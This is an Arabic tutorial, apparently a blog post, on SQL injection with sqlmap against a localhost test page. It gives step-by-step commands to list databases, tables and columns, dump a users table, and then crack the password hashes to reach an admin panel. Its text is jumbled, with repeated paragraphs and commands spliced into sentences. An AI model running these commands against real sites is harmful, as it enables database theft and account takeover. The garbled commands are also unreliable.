الدرس موجه ﻷغراض تعليمية و الكاتب و الموقع غير مسؤوﻻن عن أي أفعال تصدر منك باستخدامك للمعلومات المذكورة في الدرس.الدرس موجه لمن يمتلكون خبرة و لو بسيطة في التعامل مع أنظمة اختبار اﻹختراق كباك تراك و كالي لينكس،لن يتم التطبيق على أهداف حقيقة لتجنب اﻹستخدام السيء و الملاحقات القانونية.الدرس عبارة عن سيناريو تخيلي لعملية إختراق حقيقية و لكن بتحفظ
يعتبر مشروع SQLMAP أحد أكثر مشاريع إختبار اﻹختراق انتشارا سواء في أوساط الهاكرز اﻷخلاقيين أو غيرهم من اصحاب القبعات السوداء،لعدة أسباب أهمها الفعالية الكبيرة التي يتميز بها هذا البرنامج عن غيره من البرامج التي تتيح فحص مختلف قواعد البيانات.
تمت برمجة مشروع SQLMAP باستخدام لغة البرمجة بايثون،بحيث تم التركيز على جعلها آداة خفيفة على ذاكرة الجهاز مع عدم إغفال الفاعلية،و على حسب مطوريها فإنهم وجدوا ذلك في بايثون.
بإمكان أداة SQLMAP القيام بفحص عدة أنواع من قواعد البيانات و هي:
sqlmap : و هو مشروعنا الذي هو محور الدرس بطبيعة الحال
u- : و معناها أننا نريد فحص URL مشكوك في أمره،يجب كتابة العنوان مباشرة بعد u- بين علامتي تنصيص مزدوجتين "URL"
الرابط الذي أرفقناه هو عبارة عن رابط عضوية الشخص المسمى relax.
dbs- : و معناها أننا نطلب من مشروع SQLMAP التحري عن كل قواعد البيانات و عرض أسمائها
dbms=mysql- : و معناها أننا نخبر مشروع SQLMAP بأن السيرفر يستخدم محرك قواعد البيانات MySQL
سنفترض أنه المشروع قد قام بالبحث و وجدت عددا من قواعد البيانات هي كالتالي:
D- معناها قم بعملية Dumping لقاعدة البيانات vurln و قم باستخراج ما سنطلبه و هو
tables- : بعد انتهاء عملية Dumping قم باستعراض جداول قاعدة البيانات و لنفترض أنها تحوي جدوﻻ واحدا هو جدول المستخدمين
T- معناها أعد عملية Dumping للجدول المعطى و هو users
col– : و معناها استخرج الخانات Columns و سنفترض أنه قد أعطانا النتيجة التالية:
تمت برمجة مشروع SQLMAP باستخدام لغة البرمجة بايثون،بحيث تم التركيز على جعلها آداة خفيفة على ذاكرة الجهاز مع عدم إغفال الفاعلية،و على حسب مطوريها فإنهم وجدوا ذلك في بايثون.
بإمكان أداة SQLMAP القيام بفحص عدة أنواع من قواعد البيانات و هي:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,طريقة اﻹستخدام: بالنسبة لمن يستخدمون نظام باك تراك فعليهم كتابة اﻷوامر كالتالي
SQLite, Firebird, Sybase and SAP MaxDB database management systems.
./sqlmap.py commandفي حين من يستخدمون نظام كالي لينكس فعليهم كتابة اﻷوامر كالتالي:
sqlmap commandباعتبار أني من مستخدمي كالي لينكس فسأستعمل اﻷمر الثاني.ﻻستعراض قواعد البيانات الموجودة على السيرفر يكفي كتابة اﻷمر التالي:
sqlmap -u "http://127.0.0.1/vurln.php?user=relax" –dbs –dbms=mysqlدعونا نشرح هذا اﻷمر بالتفصيل:
sqlmap : و هو مشروعنا الذي هو محور الدرس بطبيعة الحال
u- : و معناها أننا نريد فحص URL مشكوك في أمره،يجب كتابة العنوان مباشرة بعد u- بين علامتي تنصيص مزدوجتين "URL"
الرابط الذي أرفقناه هو عبارة عن رابط عضوية الشخص المسمى relax.
dbs- : و معناها أننا نطلب من مشروع SQLMAP التحري عن كل قواعد البيانات و عرض أسمائها
dbms=mysql- : و معناها أننا نخبر مشروع SQLMAP بأن السيرفر يستخدم محرك قواعد البيانات MySQL
سنفترض أنه المشروع قد قام بالبحث و وجدت عددا من قواعد البيانات هي كالتالي:
available databases [4]:سنستهدف اﻵن قاعدة البيانات vurln و نريد استعراض الجداول التي تحويها...اﻷمر بسيط جدا فكل ما عليك فعله هو تطبيق اﻷمر التالي:
information_schema
mysql
performance_schema
vurln
sqlmap -u "http://127.0.0.1/vurln.php?user=relax" -D vurln –tablesأعتقد أن اﻷمر بسيط و لم يتغير كثيرا عن سابقه إﻻ في نهايته:
D- معناها قم بعملية Dumping لقاعدة البيانات vurln و قم باستخراج ما سنطلبه و هو
tables- : بعد انتهاء عملية Dumping قم باستعراض جداول قاعدة البيانات و لنفترض أنها تحوي جدوﻻ واحدا هو جدول المستخدمين
Database: vurlnاﻵن سنعمل على استخراج الخانات الموجودة في الجدول users عن طريق اﻷمر التالي:
[1 table]
+-------+
| users |
+-------+
sqlmap -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –colسنشرح فقط اﻷجزاء الجديدة من اﻷمر،بعد القيام بعملية Dumping لقاعدة البيانات:
T- معناها أعد عملية Dumping للجدول المعطى و هو users
col– : و معناها استخرج الخانات Columns و سنفترض أنه قد أعطانا النتيجة التالية:
Database: vurlnأخيرا و ﻹتمام العملية لم يبقى لنا سوى العمل على استعراض الجدول عن طريق اﻷمر
Table: users
[3 columns]
+----------+-------------+
| Column Type |
+----------+-------------+
| ID | tinyint(4) |
| password | varchar(32) |
| username | varchar(20) |
+----------+-------------+
sqlmap -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –dumpلم يبقى أمامك إﻻ كسر تشفير كلمات المرور من أجل الدخول إلى لوحة تحكم اﻹدارة.
تعليقات
إرسال تعليق
شاركنا رأيك حول الموضوع...